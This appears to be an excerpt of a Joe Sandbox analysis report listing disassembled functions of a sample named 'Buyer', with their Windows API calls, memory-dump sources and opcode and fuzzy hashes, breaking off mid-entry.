                                                                                                    Function 00F796DB Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,00F84667,?,00000000,00000000,?,00F7978A,?,?,00000002,00000000), ref: 00F79714
                                                                                                    • GetLastError.KERNEL32(?,00F7978A,?,?,00000002,00000000,?,00F75EB1,?,00000000,00000000,00000002,?,?,?), ref: 00F7971E
                                                                                                    • __dosmaperr.LIBCMT ref: 00F79725
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                    • String ID:
                                                                                                    • API String ID: 2336955059-0
                                                                                                    • Opcode ID: 04d5af53bd0f76c36799c3112109258e88837cde66444b3d1ee3630c846d464d
                                                                                                    • Instruction ID: ae0a8d4d87bc2352372462778ec8a7fa3a19e185a6c8ca49235a88f8535be500
                                                                                                    • Opcode Fuzzy Hash: 04d5af53bd0f76c36799c3112109258e88837cde66444b3d1ee3630c846d464d
                                                                                                    • Instruction Fuzzy Hash: 5B01F033A34518ABCB099F6DDC45C6E772ADB85330B24824AF819D7190E671DD42E791
                                                                                                    Function 00F4E0D8 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • TranslateMessage.USER32(?), ref: 00F4E11B
                                                                                                    • DispatchMessageW.USER32(?), ref: 00F4E129
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F4E13F
                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00F4E151
                                                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00F9225F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3288985973-0
                                                                                                    • Opcode ID: ae5bfe73de20920d39bea4a522cd7fbf2d425fb8a102e8f4c089a058cbff5b86
                                                                                                    • Instruction ID: 83a42c8f12a6deffadacab8f6dcec1f58be73d4ca0eb8193e3fbeead620a3641
                                                                                                    • Opcode Fuzzy Hash: ae5bfe73de20920d39bea4a522cd7fbf2d425fb8a102e8f4c089a058cbff5b86
                                                                                                    • Instruction Fuzzy Hash: 6EF05E31A053459AFB748BB0DC49FDA37ADEB84310F104919FA59930C0DB789448EB11
                                                                                                    Function 00F519C0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __Init_thread_footer.LIBCMT ref: 00F51EA6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Init_thread_footer
                                                                                                    • String ID: CALL
                                                                                                    • API String ID: 1385522511-4196123274
                                                                                                    • Opcode ID: 58525c892666c54330e891c55d7ea01a4c71a55f211c209fab3c9ca5d2e1c837
                                                                                                    • Instruction ID: 24b6fbd849c5c5253e503d7b26afbe50fdab740bf1b919284f9d4ee89c720d7f
                                                                                                    • Opcode Fuzzy Hash: 58525c892666c54330e891c55d7ea01a4c71a55f211c209fab3c9ca5d2e1c837
                                                                                                    • Instruction Fuzzy Hash: E9229C70A083019FD714DF14C884B2ABBF1BF89315F24895DF9968B3A1D775E849EB82
                                                                                                    Function 00F50830 Relevance: 3.6, APIs: 2, Instructions: 643COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d9e4eadb85a28af0e37726d75ecfddecb91b1241a17df202a6e8c8ae14fdd512
                                                                                                    • Instruction ID: 3032667c873eae9079cd27758a0af5ce4cd1ef5811a420041de01ff5a1bec66e
                                                                                                    • Opcode Fuzzy Hash: d9e4eadb85a28af0e37726d75ecfddecb91b1241a17df202a6e8c8ae14fdd512
                                                                                                    • Instruction Fuzzy Hash: E132EC31E00608DFEF25EF54CC81BAEB7B0AF05721F144569EA15AB291DB34ED48EB81
                                                                                                    Function 00F5FFC0 Relevance: 3.1, APIs: 2, Instructions: 94libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindCloseChangeNotification.KERNEL32 ref: 00F6005D
                                                                                                    • LoadLibraryExW.KERNELBASE ref: 00F6006F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChangeCloseFindLibraryLoadNotification
                                                                                                    • String ID:
                                                                                                    • API String ID: 1525634188-0
                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                    • Instruction ID: 2a7e21f9be9ab96f52b69268b38f2f72a8c3f63dc81594854d89e3388246a74a
                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                    • Instruction Fuzzy Hash: 5231C771A00105EFC718DF58D480A6AF7A6FF49354B3486A5E40ACB656EB32EDC1EBD0
                                                                                                    Function 00F43989 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F43A5A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IconNotifyShell_
                                                                                                    • String ID:
                                                                                                    • API String ID: 1144537725-0
                                                                                                    • Opcode ID: a369b3a7026113de71496427c81c14aceeea34964c3265e447b89f73c90922be
                                                                                                    • Instruction ID: 7df65f3cded13ed1dbe733540c0b960e8f8f9d8d533fcc6cddc0e1039435dc3f
                                                                                                    • Opcode Fuzzy Hash: a369b3a7026113de71496427c81c14aceeea34964c3265e447b89f73c90922be
                                                                                                    • Instruction Fuzzy Hash: 0A3191B09047018FD320DF24D885797BBF8FB49718F10082DE9DA87240E7B9AA44DB92
                                                                                                    Function 00F4B940 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __Init_thread_footer.LIBCMT ref: 00F4BD7E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Init_thread_footer
                                                                                                    • String ID:
                                                                                                    • API String ID: 1385522511-0
                                                                                                    • Opcode ID: a0303d4d0a631a375bdbfccf0936f7f09b9afd2bfa9aa99dcc0dd378e019ef65
                                                                                                    • Instruction ID: ee77dc217fcb63a50567467ff36118ce034f2815683047c5fe2d97722be68b25
                                                                                                    • Opcode Fuzzy Hash: a0303d4d0a631a375bdbfccf0936f7f09b9afd2bfa9aa99dcc0dd378e019ef65
                                                                                                    • Instruction Fuzzy Hash: EC326975A002099FDF24CF58C884BBABBB5FF44324F198059ED45AB252CB78ED41EB91
                                                                                                    Function 00FC7823 Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LoadString
                                                                                                    • String ID:
                                                                                                    • API String ID: 2948472770-0
                                                                                                    • Opcode ID: ca6e37e421c79fd7d69de90de8cb70913c2cfe21a60700cdaf770a1497400c05
                                                                                                    • Instruction ID: cd536e95c3e2f54f87a33fdce409df0485b1bb9300379a990745eb5fdb15394f
                                                                                                    • Opcode Fuzzy Hash: ca6e37e421c79fd7d69de90de8cb70913c2cfe21a60700cdaf770a1497400c05
                                                                                                    • Instruction Fuzzy Hash: ECD17E31E0420ADFCB14EF98C982EADBBB5FF48310F144159E915AB291DB34AE41DF90
                                                                                                    Function 00F6F0E6 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 905358f0a88a2094b1cea5eacebc8917f924481b4e2c233cc0c38458d0f86593
                                                                                                    • Instruction ID: c21d8807d53a024bc834e7fdecb7da2eb2b199e6e819ef6dd80de1ecb6a489a8
                                                                                                    • Opcode Fuzzy Hash: 905358f0a88a2094b1cea5eacebc8917f924481b4e2c233cc0c38458d0f86593
                                                                                                    • Instruction Fuzzy Hash: EA51D476E00108AFDB10CF68DC51BA97BB2EF86364F1981A8E8089B391C735ED46DB50
                                                                                                    Function 00FAF9DF Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00FAF9F8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BuffCharLower
                                                                                                    • String ID:
                                                                                                    • API String ID: 2358735015-0
                                                                                                    • Opcode ID: eb98db23890528b5432fde8f455aabafd6d9cd47b88a9224a1e31f13a1f762eb
                                                                                                    • Instruction ID: 81ef4e14379ca3a8bccccd721d9dbc6b63dca9ea730d0442bd3d18e037fde445
                                                                                                    • Opcode Fuzzy Hash: eb98db23890528b5432fde8f455aabafd6d9cd47b88a9224a1e31f13a1f762eb
                                                                                                    • Instruction Fuzzy Hash: 5E41B3B2900209AFCB11EFA4CC819EFB7B8EF45354B10453AE51ADB251EB74DE08DB60
                                                                                                    Function 00F454DE Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F454A3: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F454F0,?,?,00F45184,?,00000001,?,?,00000000), ref: 00F454AF
                                                                                                      • Part of subcall function 00F454A3: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F454C1
                                                                                                      • Part of subcall function 00F454A3: FreeLibrary.KERNEL32(00000000,?,?,00F454F0,?,?,00F45184,?,00000001,?,?,00000000), ref: 00F454D3
                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00F45184,?,00000001,?,?,00000000), ref: 00F45510
                                                                                                      • Part of subcall function 00F4546C: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F8466F,?,?,00F45184,?,00000001,?,?,00000000), ref: 00F45475
                                                                                                      • Part of subcall function 00F4546C: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F45487
                                                                                                      • Part of subcall function 00F4546C: FreeLibrary.KERNEL32(00000000,?,?,00F8466F,?,?,00F45184,?,00000001,?,?,00000000), ref: 00F4549A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressFreeProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2632591731-0
                                                                                                    • Opcode ID: bbc982493590634b4757a50ee5e6832b1916ab9f1f99038916bc14b6eb34df2e
                                                                                                    • Instruction ID: 0486efc77c0f2c902e537a48716da8e257631fa5314845a7ca3c763342b38996
                                                                                                    • Opcode Fuzzy Hash: bbc982493590634b4757a50ee5e6832b1916ab9f1f99038916bc14b6eb34df2e
                                                                                                    • Instruction Fuzzy Hash: 7811A732700605ABCB14FB64CC12BBD7BB69F41B15F144429F842AA1D2EE789A45BB54
                                                                                                    Function 00F78752 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __wsopen_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 3347428461-0
                                                                                                    • Opcode ID: 5e14381b2558d6cdef951c3162b2d2d10ec7101a6f081a4054f09b094e7b8a04
                                                                                                    • Instruction ID: b40c92774443165374913fd4af528258f67cba88e8e71487bdeb5b9d31de25cd
                                                                                                    • Opcode Fuzzy Hash: 5e14381b2558d6cdef951c3162b2d2d10ec7101a6f081a4054f09b094e7b8a04
                                                                                                    • Instruction Fuzzy Hash: 04114871A0420AAFCB09DF58E94599B7BF5EF48350F10806AFC09AB311EA31DA12DB65
                                                                                                    Function 00F6E952 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b78347c3af4faeddaf6041936be61502238db1ea0e0acd99a45db38c25bd97f7
                                                                                                    • Instruction ID: b8fa4aa1e809e0bcb551bf149e53397885717f53e7408c0230cad5cf3814accd
                                                                                                    • Opcode Fuzzy Hash: b78347c3af4faeddaf6041936be61502238db1ea0e0acd99a45db38c25bd97f7
                                                                                                    • Instruction Fuzzy Hash: DFF04C379006145AE6313A2ADC09B6B33A89F43770F108B16F869931C1EF7CD806B6D3
                                                                                                    Function 00FBF674 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00FBF6B1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentVariable
                                                                                                    • String ID:
                                                                                                    • API String ID: 1431749950-0
                                                                                                    • Opcode ID: 2091d944934faa8b7b7c8969624807868543cba705156473a327da19a6a1d4d9
                                                                                                    • Instruction ID: 6697f79220a5fb61de9b4acb9c72bf3c9da995e35ddff3b6eb1c1f6014dad21f
                                                                                                    • Opcode Fuzzy Hash: 2091d944934faa8b7b7c8969624807868543cba705156473a327da19a6a1d4d9
                                                                                                    • Instruction Fuzzy Hash: 91F03175600214AFCB04EB65DC46D9F7BA9EF45720F000055F5059B261EA74AE41DB61
                                                                                                    Function 00F73B70 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00F66A59,?,0000015D,?,?,?,?,00F68590,000000FF,00000000,?,?), ref: 00F73BA2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: f37749783791d930fafd7408b67868d522a4c99fa0d8a197ed2dbd361f6c5a67
                                                                                                    • Instruction ID: 29f932d3ef656384f1b72e53be87c59623b2b5f54533e9bbb0158ce1ac548b71
                                                                                                    • Opcode Fuzzy Hash: f37749783791d930fafd7408b67868d522a4c99fa0d8a197ed2dbd361f6c5a67
                                                                                                    • Instruction Fuzzy Hash: 80E06531941625B6E7212A7E9C04F5A375DEBC17B0F158113EC0DA6094DB18CE00B2E7
                                                                                                    Function 00F4554C Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ef0ffb7fb1621c47bdd199c708fb1b51002861f6733571ea9861fd2ecaf261f3
                                                                                                    • Instruction ID: a0bfe6f21c80c70b9260420be29b7940cfe18397b2a928985d2f7b6c7117b909
                                                                                                    • Opcode Fuzzy Hash: ef0ffb7fb1621c47bdd199c708fb1b51002861f6733571ea9861fd2ecaf261f3
                                                                                                    • Instruction Fuzzy Hash: 2FF03075501B12CFC734AF64D490966BBF5BF14729318893EE5DA82621C731A840EF50
                                                                                                    Function 00F95A5C Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
